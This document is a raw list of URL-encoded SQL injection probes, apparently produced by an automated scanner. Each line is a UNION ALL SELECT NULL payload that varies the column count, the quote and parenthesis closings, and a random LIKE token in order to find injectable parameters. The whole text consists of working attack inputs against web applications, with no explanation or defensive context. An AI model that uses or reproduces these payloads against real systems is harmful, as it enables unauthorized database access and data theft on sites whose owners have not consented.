1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27KOaG%27%20LIKE%20%27KOaG 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27IkRV%27%20LIKE%20%27IkRV 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27VPoU%27%20LIKE%20%27VPoU 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27whYP%27%20LIKE%20%27whYP 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27bXIt%27%20LIKE%20%27bXIt 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27bTOJ%27%20LIKE%20%27bTOJ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27QIZx%27%20LIKE%20%27QIZx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27fLBL%27%20LIKE%20%27fLBL 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27pleZ%27%20LIKE%20%27pleZ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27zXRL%27%20LIKE%20%27zXRL 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27bdtz%27%20LIKE%20%27bdtz 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27aGZv%27%20LIKE%20%27aGZv 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ifei%27%20LIKE%20%27ifei 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27iErP%27%20LIKE%20%27iErP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27PlFS%27%20LIKE%20%27PlFS 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27UWQp%27%20LIKE%20%27UWQp 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TBQa%27%20LIKE%20%27TBQa 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ERpC%27%20LIKE%20%27ERpC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27JGia%27%20LIKE%20%27JGia 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27yplF%27%20LIKE%20%27yplF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27PGhk%27%20LIKE%20%27PGhk 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27WuoA%27%20LIKE%20%27WuoA 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ZBLP%27%20LIKE%20%27ZBLP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hWDW%27%20LIKE%20%27hWDW 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27blMj%27%20LIKE%20%27blMj 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27yKnJ%27%20LIKE%20%27yKnJ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27kwDK%27%20LIKE%20%27kwDK 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27sNrF%27%20LIKE%20%27sNrF 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27zZOP%27%20LIKE%20%27zZOP 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ZIQT%27%20LIKE%20%27ZIQT 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27XkEE%27%20LIKE%20%27XkEE 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27hRuC%27%20LIKE%20%27hRuC 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Wvdq%27%20LIKE%20%27Wvdq 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HZNu%27%20LIKE%20%27HZNu 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22UyNq%22%3D%22UyNq 